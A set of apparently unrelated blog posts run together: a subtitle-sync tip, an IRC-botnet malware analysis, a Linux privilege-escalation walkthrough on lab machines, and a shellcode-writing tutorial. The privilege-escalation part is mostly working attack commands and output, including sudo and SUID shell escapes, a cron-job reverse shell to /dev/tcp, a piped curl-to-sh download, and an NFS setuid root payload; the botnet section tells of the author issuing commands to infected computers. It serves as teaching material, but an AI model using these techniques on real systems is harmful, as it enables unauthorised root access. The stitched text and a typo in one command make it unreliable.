Quick Fixes with Shortcut Keys

If you notice that the video and subtitles are not aligning properly, here are some quick shortcuts you can use:

Voice Ahead of Subtitles

F: Moves the audio track backward by 50ms

Subtitles Ahead of Video:

G: Moves the audio track forward by 50ms

While these shortcuts can be handy, they require constant manual adjustment, which can be tiresome.

A Smarter Approach

Instead of manually adjusting the synchronization, you can take a smarter approach:

Identify Key Speaking Points:

Open the subtitles document and note where the first person starts speaking. For instance, if the first person speaks at 00:53, take note of it.

Find the Corresponding Video Time

Next, open the video and locate where the first person starts speaking. For example, if it’s at the 00:38 time mark, make a note of that too.

Calculate the Discrepancy

Now, it’s time for a little math. Subtract the video time from the subtitle starting time. In our example, it would be 00:38–00:53 = -00:15.

Utilize Track Synchronization Tools

Most video players come equipped with track synchronization tools. Locate this feature in your player’s settings.

Input the Discrepancy

Input the calculated discrepancy (-00:15 in our example) into the track synchronization tool.

Apply and Enjoy: Apply the synchronization adjustment, close the settings, and voila! Your video and subtitles should now be perfectly aligned

🍀 Good luck! 🌟 All the best! 🤞

Hey there! I wanted to share some insights with you. On a malware analysis project, I had researched

Setting Up the Sandbox Environment:

Let’s kick things off by setting up a safe playground. We do this by installing Windows on a virtual machine, like VirtualBox or VMware. We then set up snapshots. This step is crucial, so we take an image of the system’s initial state. It helps us go back to how things were before or spot any changes the malware makes.

Packer Detection:

Next, we turn to a tool called PEiD, which helps us detect packers.

Think of a software packer as a magic tool for making computer programs smaller and harder to understand and it also makes it tricky for people to figure out what’s inside.

As you can see the malware is packed using UPX

Unpacking the Malware:

Upon identifying the packer as UPX, we proceed to unpack the malware using UPX, exposing the malware’s inner workings.

Static Analysis:

For static analysis, I started by using Oletools to examine the files.

We use OleTools to dig deeper into the sample. By looking at the commands the malware uses, we can get an idea of what it can do. We found out that the malware connects to the internet by checking the libraries it uses

We looked at the libraries the malware uses using a powerful tool called PE Studio. It’s clear from our analysis that the malware connects to the internet.

Note: PEStudio is a super helpful tool for digging into software.

We used Wireshark to confirm the malware’s internet connection. This tool revealed that two files were downloaded, helping us understand the malware’s behaviour better.

Wireshark is like a detective tool for computer networks. It lets you watch and analyze the data moving between devices on the network. You can see what’s going in and out, kind of like peeking at the traffic on the internet highway. It’s useful for diagnosing network problems, checking for security issues, and understanding how data is flowing in your network.

Tracking IRC Communication:

Digging even deeper into our investigation, we looked at the TCP chat between the malware and an IRC server. We spotted something interesting — a text message that mentioned “#malfor-bale,” showing that the malware was indeed connected to an IRC server.

We have discovered an IRC botnet

IRC (Internet Relay Chat): Think of IRC like a very old-school and basic chatroom(message platform ) on the internet. People can join chat rooms, talk to each other, and exchange messages in real-time. It’s like a big online meeting place where you can chat with others.

Botnet: A botnet is a group of computers that are controlled by one person, like an evil puppet master. Imagine they have a bunch of puppets (the computers) on strings, and they make these puppets do bad things. For example, they might tell the puppets to attack a website, send spam, or steal information.

A CNC (Command and Control) server: a computer or server that is used by puppet masters to remotely manage and control a network

IRC Botnet: An IRC botnet combines these two ideas. It’s like having a bunch of puppet computers that are all connected to a secret chat room on the internet (IRC). The puppet master uses this chatroom to control all the puppets and make them do bad stuff. It’s a way for them to coordinate and give orders to the infected computers, making it easier for them to carry out cybercrimes.

In short, an IRC botnet is a group of infected computers controlled through an old-style internet chatroom, used for doing harmful things like attacking websites or stealing data.

Discovering the CNC Server:

• We discovered that the service host was talking to a special server that gives commands (CNC server) to computers in that network. To connect to the chat server, we used the Irssi program, which helps us chat with the botnet’s chat server.

Finally, we took apart the computer program , enabling us to connect to IRC. This binary includes functions for interacting with the IRC server and executing commands, as demonstrated when we opened the calculator using the ‘exec’ command.

I decompiled it using Ghidra. Ghidra is a software that we use to reverse take apart programs and see how they run.

Connects to IRC

Z9ircclient this function has functions that show us how to interact with the IRC server and to communicate with it.

The offset strings are the commands

Here in the example above we can see hello and exec

Using the exec command shown above I can execute the cmd command.so I opened the calculator app on all the bot’s computers

I appreciate your time in reviewing this and I hope this case study provides valuable insights into the world of malware analysis.

Major props to my cyber comrade @shellawk for plugging me into that wicked malware! 🚀 also major shout out to my boy @kvltByte for reviewing the blog

Who needs pals when you’re rollin’ with an underground tech connection this lit? 😎💥

Privilege escalation is where a computer user uses system flaws or configuration errors to gain access to other user accounts in a computer system. By acquiring other accounts they get to access more files and they can also run administrator commands.

In privilege escalations, there are two types of privilege escalations

1. Vertical privilege escalation.

2. Horizontal privilege escalation.

Vertical privilege escalation is where an attacker tries to access accounts with more permissions than the account they have. Most often attackers try to access accounts with administrator Privileges.

Horizontal privilege escalation — this is where an attacker has access rights to another user who has the same level of access he or she has.

In Linux, one can do privilege escalation(privesc) by,

1. Kernel exploits flaws.

2. Programs that the user can sudo.

3. Programs with setuid bit on.

4. Limited capabilities.

5. Changing the cron jobs file.

6. Writable folders.

7. Exploiting Network File Sharing(NFS) .

There are automated tools to do privilege escalations like

LinPeas:

GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)

LinEnum:

GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

This tool does recon for you and shows you attack vectors that you can use to exploit the system and get root access or they can be used to run automatically and give you root permission.

To run linpeas you run this command

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

What this does is that it will download the script and run it.

1. kernel exploits

The kernel is a computer program at the core of a computer’s operating system and generally has complete control over everything in the system. It is the portion of the operating system code that is always resident in memory and facilitates interactions between hardware and software components. The kernel is usually written in a low-level language like c thus one can use binary exploitation techniques to find flaws within it

Once the kernel error is found it is usually published and people write POC(proof of concept)

If you want to gain privilege escalation you can search for a POC using

cat /proc/version
uname -a
searchsploit "Linux Kernel version" or search in google site:exploit-db.com "Linux kernel version

SearchSploit is a command-line search tool for Exploit-DB that allows you to take a copy of Exploit Database with you everywhere you go.

2. programs that the user can sudo

The “sudo -l” command is used to list the permissions or privileges that a user has when executing commands with “sudo” (Superuser Do). “sudo” is a command found in Unix-like operating systems that allows authorized users to execute commands with the privileges of the superuser (root), or another user as specified in the sudoers file.

When you run “sudo -l”, the system checks the sudoers file to determine what commands the current user is allowed to execute with elevated privileges. The sudoers file is typically located at “/etc/sudoers” or “/etc/sudoers.d/” and is usually edited with the “visudo” command, which provides a syntax check to prevent accidental errors.

The output of “sudo -l” will show a list of allowed commands or rules for the current user, which can include:

Specific commands: The user may have permission to run particular commands with elevated privileges. For example, the output may list commands like “sudo ls” or “sudo apt-get update.”

All commands: The user might have unrestricted access to execute any command with “sudo” privileges.

No commands: In some cases, the user might not have any “sudo” privileges, and the output will indicate that there are no allowed commands.

The purpose of “sudo -l” is to allow users to check their own sudo permissions without actually running any commands with elevated privileges. This is particularly useful for users to verify their level of access or when troubleshooting issues related to sudo permissions.

By running sudo -l we can see all the binaries a user can do. we first run sudo -l

Then we headed to *GTFO and search if one of the binaries can be used to maintain privilege

GTFOBins

$ sudo -l
Matching Defaults entries for karen on ip-10–10–148–237:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User karen may run the following commands on ip-10–10–148–237:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano

karen@ip-10–10–58–234:/tmp/ldpreload$ whoami
karen
karen@ip-10–10–58–234:/tmp/ldpreload$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
karen@ip-10–10–58–234:/tmp/ldpreload$ sudo find . -exec /bin/sh \; -quit
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)

3. programs with setuid bit on

The setuid bit is a permission bit that allows the users to run an executable with the file system permissions of the executable’s owner or group respectively and to change behavior in directories. It is often used to allow users on a computer system to run programs with temporarily elevated privileges in order to perform a specific task.

We run the command

find / -type f -perm -04000 -ls 2>/dev/null

To detect binaries that have the suid bit on, then we check in gtfobins.github.io

If the binary can lead to a privilege escalation

1857 52 -rwsr-xr-x 1 root root 53040 May 28 2020 /usr/bin/chsh
1722 44 -rwsr-xr-x 1 root root 43352 Sep 5 2019 /usr/bin/base64
1674 68 -rwsr-xr-x 1 root root 67816 Jul 21 2020 /usr/bin/su

karen@ip-10–10–181–108:/tmp$ base64 /etc/passwd | base64 - decode
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

4. Limited capabilities

This occurs when an administrator raises the permission of a binary using the getcap tool.

We search for this flaw using getcap.

getcap -r / 2>/dev/null

After running getcap -r check the binaries that can be exploited

karen@ip-10–10–91–51:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep

In the above example, we can see that vim is also listed so we search for our good old friend GTFObins

And by running

vim -c `:py3 import os; os.setuid(0); os.excel("/bin/sh", "sh", "-c", "reset; exec sh")'

We get an elevated shell

5. changing the cron jobs file.

Cron is a command-line utility that is used to create job scheduling in Linux. It is used to automate tasks

We first check for the crontab config in

/etc/crontab

Below is a crontab log

$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)

karen@ip-10–10–23–186:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# . - - - - - - - - minute (0–59)
# | . - - - - - - - hour (0–23)
# | | . - - - - - day of month (1–31)
# | | | . - - - - month (1–12) OR jan,feb,mar,apr …
# | | | | . - - day of week (0–6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts - report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts - report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts - report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts - report /etc/cron.monthly )
#
* * * * * root /antivirus.sh
* * * * * root antivirus.sh
* * * * * root /home/karen/backup.sh
* * * * * root /tmp/test.p

We first check /karen/backup.sh

karen@ip-10–10–23–186:~$ ls -lh /home/karen/
total 4.0K
-rw-r - r - 1 karen karen 77 Jun 20 10:21 backup.sh
karen@ip-10–10–23–186:~$ cat backup.sh
#!/bin/bash
cd /home/admin/1/2/3/Results
zip -r /home/admin/download.zip ./*

We first modify /Karen/backup.sh since we have permission

And we make it return to us a reverse shell

$ mv backup.sh backup.sh.bkup
$ touch backup.sh
$ vim backup.sh
# Insert this line with your IP in the script:
bash -i >& /dev/tcp/your-ip/6666 0>&1

And then we set up a listener that the box can connect back to us

$ nc -lvp 6666
listening on [any] 6666 …
10.10.23.186: inverse host lookup failed: Unknown host
connect to [1.2.3.4] from (UNKNOWN) [10.10.23.186] 49878
bash: cannot set terminal process group (13249): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10–10–23–186:~#

And that is how you get a shell using crontab

6 Exploiting the Network File Sharing Protocol (NFS)

Network File Sharing (NFS) is a protocol that allows you to share directories and files with other Linux clients over a network.

We first check /etc/exports for the config file.

karen@ip-10–10–242–200:/$ cat /etc/exports
# /etc/exports: the access control list for file systems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)

We note that /etc/exports file has files with no_root_squash this means that files can be created with root permission.

So using the attacker’s machine we access the victim’s machine

Using these commands

Show mount to see mounted files.

$ showmount -e 10.10.242.200
Export list for 10.10.242.200:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *

We then create a folder to mount the file then connect it to the victim NFS

$ mkdir /tmp/sharedfolder
$ mount -o rw 10.10.242.200:/home/ubuntu/sharedfolder /tmp/sharedfolder

We then create a payload. It’s important that while creating the payload we ensure that. We set user id to 0 and group id to 0, fail to do this and the shell will revert to user from the root user account.

User id 0 belongs to the root user account.

#include <stdio.h>
#include <stdlib.h>
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}

We then compile it and assign a suid bit and run it

$ gcc main.c -o pwned -w
$ sudo chmod 777 /tmp/sharedfolder/pwned
$ sudo chmod +s /tmp/sharedfolder/pwned
karen@ip-10–10–242–200:/home/ubuntu/sharedfolder$ whoami
karen
karen@ip-10–10–242–200:/home/ubuntu/sharedfolder$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
karen@ip-10–10–242–200:/home/ubuntu/sharedfolder$ ls -lh
total 16K
-rwsr-sr-x 1 root root 16K Nov 11 12:44 pwned
karen@ip-10–10–242–200:/home/ubuntu/sharedfolder$ ./pwned
root@ip-10–10–242–200:/home/ubuntu/sharedfolder#

if you enjoyed my blog you can check out my boys blog at

trustie_rity - Medium

to practice linux privesc go to

Privilege Escalation

References:

• https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html
• https://cloud.netapp.com/blog/azure-anf-blg-linux-nfs-server-how-to-set-up-server-and-client#:~:text=Network%20File%20Sharing%20(NFS)%20is,have%20access%20to%20the%20folder.
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
• https://book.hacktricks.xyz/linux-unix/privilege-escalation

Shellcode injection is a powerful technique that allows the injection and execution of custom code within a target process. In this blog post, we’ll explore different approaches to writing shellcode and discuss methods to streamline the development of assembly code.

way one

The Power of Pwntools: Crafting Shellcode with Python

One of the easiest ways to write shellcode is by using the Python library called pwntools. Pwntools provides a rich set of features to simplify exploit development, including a module called shellcraft, which helps in crafting shellcode for various operations.

Here’s an example of using pwntools and shellcraft to generate shellcode that reads and prints the contents of the “/flag” file:

from pwn import *
context.update(arch=”amd64")
pay=(asm(shellcraft.cat(‘/flag’)))
print(pay)

By leveraging pwntools and shellcraft, you can easily generate shellcode for different operations, such as file manipulation, network communication, or privilege escalation.

Hold up!!! That’s not the end, some of us do not want peace.

all in all its best to have multiple ways to do things since you may want a functionality that is not implemented by pwn tools

way two

Hard coding Assembly: Fine-grained Control and Understanding

directly hard code it using assembly like the chad you are

For those seeking more control and a deeper understanding of the inner workings of shellcode, hard coding assembly instructions can be a viable approach. Let’s take a closer look at the assembly code for opening, reading, and writing a file using the x86_64 architecture:

By directly working with assembly code, you have fine-grained control over the instructions and thus you can better understand the interactions between the operating system and your code.

save the file as a as a dot .s file eg thanks for readintheblog.s then compile it with the -nostdlib flag

though assembly is for chads it lacks documentation

the best documentation out there are x86_64 syscall tables

https://x64.syscall.sh/

flags/arguments to call functions in assembly are not clear and concise. That is why we have to be smart the smartest way to move is by the use of c and yes you do not need to learn programming to be a hacker.

part way 3 and way 4

Using C to Implement Binary: Streamlining the Process

While writing shellcode in assembly can be powerful, it can also be time-consuming. A more efficient approach is to leverage the capabilities of C programming to implement shellcode using system calls. The POSIX standard provides a common interface for system calls across different Unix-like operating systems.

we will be using the posix standard since it is a standard that is followed by all who want to interact with the kernel

the definition by chat gpt is that posix is

POSIX stands for "Portable Operating System Interface." It is a set of standards that define the application programming interface (API), shell interface, and utility interfaces for software compatibility between different Unix-like operating systems. POSIX-compliant systems provide a common framework for developing and executing software, allowing programs written for one POSIX-compliant operating system to run on another without significant modifications.

this is how you implement it

after compiling you can get the assembly code by running objdump on the compiled binary

as you can see in the photo above the registers match apart from the rax register.

From the compiled binary you just replace call command with syscall and the eax/rax register with the call number by doing this you save yourself a lot of time reading man pages

The fourth

the easiest way to do this is by using a direct syscall in c eg

#include <sys/fcntl.h>
#include <sys/unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/syscall.h>
// #include <sys/syscall.h>

#define BUFSIZE 4096


void main(){
char buffer[BUFSIZE];
ssize_t bytesRead;
ssize_t bytesWritten;
int fd;
fd=syscall(SYS_open,"/flag",O_RDONLY);
bytesRead = syscall(SYS_read, fd, buffer, BUFSIZE);
bytesWritten = syscall(SYS_write, STDOUT_FILENO, buffer, bytesRead);
syscall(SYS_close, fd);
}

the assembly code generated looks like this

this is syntax used in to pass values that are soon to be executed by a function in assembly.

this is how assembly stores arguments

rax: caries return values also carries syscal values usaly the 0 argument
rdi:    First Argument
rsi:    Second Argument
rdx:    Third Argument
rcx:    Fourth Argument
r8:     Fifth Argument
r9:     Sixth Argument

since in the c files the syscall function takes more operators one extra argument is added that pushes things to the next argument register so to reverse this you just move arguments one register back eg

what is in rdi goes to rax, what is in rsi to rdi then on and on. The good thing about this method is that you do not need to check the syscall table thus saving you more time.

Thank you for taking the time to read through this blog post. I would like to express my gratitude to the pwn.collage for their valuable training and challenging experiences, which have contributed to my understanding of shellcode injection.

I hope you found this blog post informative and helpful. If you have any further questions or need assistance, please feel free to reach out at muchiemma.sec@gmail.com . Have a great day ahead!

Originally published at https://muchiking.github.io on July 13, 2023.